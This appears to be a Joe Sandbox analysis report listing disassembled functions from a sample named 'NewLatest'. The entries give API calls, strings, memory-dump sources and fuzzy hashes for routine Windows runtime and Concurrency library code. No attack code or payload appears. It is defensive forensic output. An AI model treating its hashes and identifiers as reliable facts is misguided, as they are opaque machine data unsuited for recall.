Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: 8"e$`'e
API String ID: 161543041-2647440560
Opcode ID: 0739625414064321a302ce806620b62dbe40a8b1ed5af7b9e8ebb97ebffe173f
Instruction ID: 45aedf164d2386a544382d50cf9ffb5614ca15b8d986da858ca5a69d19512c9d
Opcode Fuzzy Hash: 0739625414064321a302ce806620b62dbe40a8b1ed5af7b9e8ebb97ebffe173f
Instruction Fuzzy Hash: DE318071600B25DFEB61ABB4E905B9673FBAF01310F14443DE049DA251DA70AD448F55

Function 0060CF2C Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00655690,00000FA0,?,?,0060CF0A), ref: 0060CF38
GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,0060CF0A), ref: 0060CF43
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,0060CF0A), ref: 0060CF54
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0060CF66
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0060CF74
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0060CF0A), ref: 0060CF97
___scrt_fastfail.LIBCMT ref: 0060CFA8
RtlDeleteCriticalSection.NTDLL(00655690), ref: 0060CFB3
CloseHandle.KERNEL32(00000000,?,?,0060CF0A), ref: 0060CFC3

Strings

SleepConditionVariableCS, xrefs: 0060CF60
WakeAllConditionVariable, xrefs: 0060CF6C
kernel32.dll, xrefs: 0060CF4F
api-ms-win-core-synch-l1-2-0.dll, xrefs: 0060CF3E

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 3578986977-3242537097
Opcode ID: 4b5898501b1d3b4d5570572b91a3b0125bce85d63fb83d6473fe5f3c12992175
Instruction ID: 7a04727b1277decf238645da06dd722c95c44c3ce3b7b3c73b5070609ef4061d
Opcode Fuzzy Hash: 4b5898501b1d3b4d5570572b91a3b0125bce85d63fb83d6473fe5f3c12992175
Instruction Fuzzy Hash: 1D01B579A80B62AFE7205FB1EC1DE9B365BDF46B51B461210FE05D72A0DA70C8408A65

Function 006225DE Relevance: 22.7, APIs: 15, Instructions: 231COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 006225F0

Part of subcall function 006223EE: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00622411

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00622611
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 0062261E
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 0062266C
Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 006226F3
Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 00622706
Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 00622753

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
String ID:
API String ID: 2530155754-0
Opcode ID: 5e704cc4ff144fc8d95acd292228241795403ba0bb604793c88ef6a74ab04674
Instruction ID: 96fe01793388a840cb1e2ecba8e59eeebc1b8ec429ccfc85be993973768d0b9e
Opcode Fuzzy Hash: 5e704cc4ff144fc8d95acd292228241795403ba0bb604793c88ef6a74ab04674
Instruction Fuzzy Hash: 98819A31904A6AABDF169F54E9A0BFE7BB3AF55304F044098EC402B392C7368D59DF61

Function 006143EE Relevance: 21.2, APIs: 14, Instructions: 189timeregistryCOMMONLIBRARYCODE

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 00614448

Part of subcall function 00614229: RtlInitializeSListHead.NTDLL(?), ref: 006142F5
Part of subcall function 00614229: RtlInitializeSListHead.NTDLL(?), ref: 006142FF

ListArray.LIBCONCRT ref: 0061447C
Hash.LIBCMT ref: 006144E5
Hash.LIBCMT ref: 006144F5
RtlInitializeSListHead.NTDLL(?), ref: 0061458A
RtlInitializeSListHead.NTDLL(?), ref: 00614597
RtlInitializeSListHead.NTDLL(?), ref: 006145A4
RtlInitializeSListHead.NTDLL(?), ref: 006145B1

Part of subcall function 00619B51: std::bad_exception::bad_exception.LIBCMT ref: 00619B73

RegisterWaitForSingleObject.KERNEL32(?,00000000,00617925,?,000000FF,00000000), ref: 00614639
Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0061465B
GetLastError.KERNEL32(0061539B,?,?,00000000,?,?), ref: 0061466D
Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 0061468A

Part of subcall function 0060FABA: CreateTimerQueueTimer.KERNEL32(?,?,00000000,?,?,0061539B,00000008,?,0061468F,?,00000000,00617916,?,7FFFFFFF,7FFFFFFF,00000000), ref: 0060FAD2

Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 006146B4

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: List$HeadInitialize$Timer$ArrayCreateHashQueueRegister$AsyncConcurrency::details::Concurrency::details::platform::__Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastLibraryLoadObjectSingleWaitstd::bad_exception::bad_exception
String ID:
API String ID: 2750799244-0
Opcode ID: 30ca5aae9260688991eeaa702a716e7f7d7354487c9df6e824d2eb7c313dcb81
Instruction ID: 7e7925983734c9e73113113cf7e7763b1e8aac0371ad110f31faeb9537a34874
Opcode Fuzzy Hash: 30ca5aae9260688991eeaa702a716e7f7d7354487c9df6e824d2eb7c313dcb81
Instruction Fuzzy Hash: D6815EB0A11A62BFD758DF74C845BD9FBA9BF09700F04421EF52897281CBB4A664CBD4

Function 00612742 Relevance: 19.7, APIs: 13, Instructions: 223COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ResourceManager::RetrieveSystemVersionInformation.LIBCONCRT ref: 00612751

Part of subcall function 00613A3C: GetVersionExW.KERNEL32(?), ref: 00613A60
Part of subcall function 00613A3C: Concurrency::details::WinRT::Initialize.LIBCONCRT ref: 00613AFF

Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00612765
Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00612786
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 006127EF
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00612823

Part of subcall function 006106FD: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 0061071D

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 006128A3

Part of subcall function 0061226C: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 00612280

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 006128EB

Part of subcall function 006106D2: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 006106EE

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 006128FF
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00612910
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 0061295D
Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00612982
Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 0061298E

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Manager::Resource$Affinity$Apply$Restrictions$Information$Topology$CaptureProcessRestriction::Version$CleanupConcurrency::details::platform::__FindGroupInitializeLimitsLogicalProcessorRetrieveSystem
String ID:
API String ID: 4140532746-0
Opcode ID: 05228cfc3ffc5b0a8e552cf5aeaa5183f121d7248daa7f26854bcb539dec0b75
Instruction ID: b0ab42bbf4938b2ccd439cb6067050130f8a7b9850270a830182f3a2289b52a1
Opcode Fuzzy Hash: 05228cfc3ffc5b0a8e552cf5aeaa5183f121d7248daa7f26854bcb539dec0b75
Instruction Fuzzy Hash: 8281A832A006578BDF08DFADD8B45EDB7B3BB48301F68452DD446A7780D630AAE5CB84

Function 006251B5 Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 308COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 006252B0
type_info::operator==.LIBVCRUNTIME ref: 006252D7
___TypeMatch.LIBVCRUNTIME ref: 006253E3
CatchIt.LIBVCRUNTIME ref: 00625438
IsInExceptionSpec.LIBVCRUNTIME ref: 006254BE
_UnwindNestedFrames.LIBCMT ref: 00625545
CallUnexpected.LIBVCRUNTIME ref: 00625560

Strings

csm, xrefs: 0062530E
%5, xrefs: 00625565
csm, xrefs: 006251F0
csm, xrefs: 0062525D

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm$%5
API String ID: 4234981820-2753281567
Opcode ID: f26e81f974cc18aedbcd38e05ed0996209548d7ec8c8de1e29ae49bdc076f836
Instruction ID: f889f6a52535cb94a6c6fc6de22c0ad04b69ad33a8478060ec6fec2ab9873d1a
Opcode Fuzzy Hash: f26e81f974cc18aedbcd38e05ed0996209548d7ec8c8de1e29ae49bdc076f836
Instruction Fuzzy Hash: B6C16971800E29DFCF25DFA4E881AEEBBB6BF14311F14415AE8026B252D731DA91CF95

Function 0060F981 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 60libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,00613AF6), ref: 0060F98F
GetProcAddress.KERNEL32(00000000,SetThreadGroupAffinity), ref: 0060F99D
GetProcAddress.KERNEL32(00000000,GetThreadGroupAffinity), ref: 0060F9AB
GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumberEx), ref: 0060F9D9
GetLastError.KERNEL32(?,?,?,00613AF6), ref: 0060F9F4
GetLastError.KERNEL32(?,?,?,00613AF6), ref: 0060FA00
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0060FA16

Strings

SetThreadGroupAffinity, xrefs: 0060F997
GetThreadGroupAffinity, xrefs: 0060F9A3
GetCurrentProcessorNumberEx, xrefs: 0060F9CE
kernel32.dll, xrefs: 0060F98A

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorHandleModule
String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
API String ID: 1654681794-465693683
Opcode ID: d7081e545e42a9248cfc201adbfcb01725856d424b087ae9411ea569c7f69ae8
Instruction ID: 5a557e51396c26ebce85c579df5c411d377379c0ca4d114ad2af1aed4db290cd
Opcode Fuzzy Hash: d7081e545e42a9248cfc201adbfcb01725856d424b087ae9411ea569c7f69ae8
Instruction Fuzzy Hash: 3E010835690311ABE7747775BC4ABBB36AFAD06700B141439F506E2591EAB4C8004668

Function 0062287D Relevance: 16.7, APIs: 11, Instructions: 222COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 0062288F

Part of subcall function 006223EE: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00622411

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 006228B0
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 006228BD
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 0062290B
Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 006229B3
Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 006229E5

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
String ID:
API String ID: 1256429809-0
Opcode ID: 8d1cbee490be3f677087a78e688ce423dc625f83eb315e28cfba20164c26ebb1
Instruction ID: 7617fb1872fa613c05abb1ed1c4bf4469febfe6bbcf6268ce0c051b9f4eadb87
Opcode Fuzzy Hash: 8d1cbee490be3f677087a78e688ce423dc625f83eb315e28cfba20164c26ebb1
Instruction Fuzzy Hash: D0719A30900A6AABDF15DF54E9A0AFEBBB3AF45304F044098EC416B392C7368D56DF61

Function 006168EA Relevance: 15.1, APIs: 10, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0061692F
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00616961
List.LIBCONCRT ref: 0061699C
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 006169AD
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 006169C9
List.LIBCONCRT ref: 00616A04
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00616A15
Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00616A30
List.LIBCONCRT ref: 00616A6B
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00616A78

Part of subcall function 00615DEF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00615E07
Part of subcall function 00615DEF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00615E19

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
String ID:
API String ID: 3403738998-0
Opcode ID: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
Instruction ID: 8ed4b8477eee70a8e512ba535bdcbe7533ed47507ec3f7438644399804007f3c
Opcode Fuzzy Hash: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
Instruction Fuzzy Hash: 55514175A00219ABDF08DF54C495BEDB3B9FF48344F09446DE956AB381DB30AE85CB90

Function 0062A3F9 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0062A40F

Part of subcall function 0062AC95: HeapFree.KERNEL32(00000000,00000000,?,0062EF6D,?,00000000,?,?,?,0062EF94,?,00000007,?,?,0062F396,?), ref: 0062ACAB
Part of subcall function 0062AC95: GetLastError.KERNEL32(?,?,0062EF6D,?,00000000,?,?,?,0062EF94,?,00000007,?,?,0062F396,?,?), ref: 0062ACBD

_free.LIBCMT ref: 0062A41B
_free.LIBCMT ref: 0062A426
_free.LIBCMT ref: 0062A431
_free.LIBCMT ref: 0062A43C
_free.LIBCMT ref: 0062A447
_free.LIBCMT ref: 0062A452
_free.LIBCMT ref: 0062A45D
_free.LIBCMT ref: 0062A468
_free.LIBCMT ref: 0062A476

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 6c83652f91c0300dffaa8d59a486df513d99097515b90731e7605a47758078eb
Instruction ID: 547050aab43d01ba150babdefa1c494d46a062216c3867675ccee0d288177319
Opcode Fuzzy Hash: 6c83652f91c0300dffaa8d59a486df513d99097515b90731e7605a47758078eb
Instruction Fuzzy Hash: 5E21C77690051DAFCB42EFD4D981DEE7BBAAF08340B018569B5059F121DB71DA488F85

Function 00617274 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 80threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 006172C0
SwitchToThread.KERNEL32(?), ref: 006172E3
Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00617302
Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 0061731E
Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 00617329
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00617350

Strings

ppVirtualProcessorRoots, xrefs: 00617348
count, xrefs: 0061728E

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementSwitchThreadstd::invalid_argument::invalid_argument
String ID: count$ppVirtualProcessorRoots
API String ID: 3791123369-3650809737
Opcode ID: 49a8b2eeaf365e6366b10a083e347e5f25ba922146c4cd97e2e5ca5a14e0fd50
Instruction ID: fa53202e04129cd2e8b420e3c5606f82c9d90ef6e5269cf1f16cdea0f3e1a68e
Opcode Fuzzy Hash: 49a8b2eeaf365e6366b10a083e347e5f25ba922146c4cd97e2e5ca5a14e0fd50
Instruction Fuzzy Hash: 75218234A00219AFCF14EFA4C4859EEB7B6BF45300F1840A9E911A7391DB30AE81CF94

Function 0062B01D Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

ext-ms-, xrefs: 0062B088
G!_, xrefs: 0062B0B7, 0062B0AD
(tbG!_, xrefs: 0062B026
api-ms-, xrefs: 0062B074

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID:
String ID: (tbG!_$G!_$api-ms-$ext-ms-
API String ID: 0-2586699396
Opcode ID: bcb9199ce99d61c518713cd2e96e158cb12d99de27f24550389f10381ac410a1
Instruction ID: 49d84d51a7126414c2e89e68d49e5c7f08e8c96c3c12ff90158cffed41818520
Opcode Fuzzy Hash: bcb9199ce99d61c518713cd2e96e158cb12d99de27f24550389f10381ac410a1
Instruction Fuzzy Hash: AB21C035A41A35ABDB338A64BC45BAB375BDF01B60F212510EE26A73D0D770ED018EE1

Function 00616D2C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00616D46
GetCurrentProcess.KERNEL32 ref: 00616D4E
DuplicateHandle.KERNEL32(00000000,000000FF,00000000,00000000,00000000,00000000,00000002), ref: 00616D63
SafeRWList.LIBCONCRT ref: 00616D83

Part of subcall function 00614D7E: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00614D8F
Part of subcall function 00614D7E: List.LIBCMT ref: 00614D99

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00616D95
GetLastError.KERNEL32 ref: 00616DA4
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00616DBA

Strings

eventObject, xrefs: 00616D8D

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorHandleLastLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
String ID: eventObject
API String ID: 165577817-1680012138
